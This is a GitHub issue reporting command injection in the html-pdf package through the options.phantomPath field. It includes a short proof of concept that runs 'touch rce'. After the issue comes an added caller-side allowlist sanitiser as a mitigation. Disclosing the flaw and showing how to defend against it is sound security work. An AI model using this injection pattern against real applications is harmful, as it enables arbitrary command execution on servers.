
Potential injection vulnerability in node-html-pdf

Open xiaofen9 opened this issue 2 years ago • 0 comments

Hi,

We would like to report a potential security vulnerability. The bug is introduced because the package-exported method create() fails to sanitize its parameter options.phantomPath and lets it flow into a sensitive command execution API.

Here is the proof of concept.

```js
var fs = require('fs');
var htmltopdf = require('dood-html-pdf');
var html = fs.readFileSync('example.html', 'utf8');
var options = {
  phantomPath: 'touch',
  phantomArgs: ['rce'],
  readLocalFile: true
};

var pdf = htmltopdf.create(html, options);
var exec = pdf.exec(); // a file named rce will be created
```

Please consider fixing it. Thanks!

xiaofen9 · Mar 04 '23 20:03
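A caller-side mitigation for the behaviour reported above, as an added example that is not part of the original issue or the package's own code: build the options object from an allowlist so that `phantomPath`, `phantomArgs` and any other unlisted key never reach `create()`. The function name `sanitizePdfOptions`, the choice of allowed keys and the timeout bound are assumptions made for this example.

```javascript
// Options an untrusted caller may influence, each with a validator.
// Which keys to allow is an assumption of this example; extend it deliberately.
const ALLOWED = {
  format: (v) => ['A3', 'A4', 'A5', 'Legal', 'Letter', 'Tabloid'].includes(v),
  orientation: (v) => v === 'portrait' || v === 'landscape',
  type: (v) => ['pdf', 'png', 'jpeg'].includes(v),
  timeout: (v) => Number.isInteger(v) && v > 0 && v <= 60000,
};

// Returns { options, rejected }: a fresh object holding only validated keys,
// plus the names of everything dropped so the caller can log or refuse.
function sanitizePdfOptions(untrusted) {
  const options = {};
  const rejected = [];
  if (untrusted === null || typeof untrusted !== 'object' || Array.isArray(untrusted)) {
    return { options, rejected };
  }
  for (const key of Object.keys(untrusted)) {
    // Own-property lookup so keys like "__proto__" or "constructor" never match.
    const known = Object.prototype.hasOwnProperty.call(ALLOWED, key);
    if (known && ALLOWED[key](untrusted[key])) {
      options[key] = untrusted[key];
    } else {
      rejected.push(key);
    }
  }
  return { options, rejected };
}

// Constructed sample input modelled on the options object in the report above,
// with two layout settings added.
const sample = {
  phantomPath: 'touch',
  phantomArgs: ['rce'],
  readLocalFile: true,
  format: 'A4',
  timeout: '30000', // wrong type (string), so it is rejected as well
};

const result = sanitizePdfOptions(sample);
console.log('passed to create():', result.options);
console.log('rejected keys:', result.rejected);
```

Logging or refusing requests with a non-empty `rejected` list also gives a detection point for attempts to set the executable path.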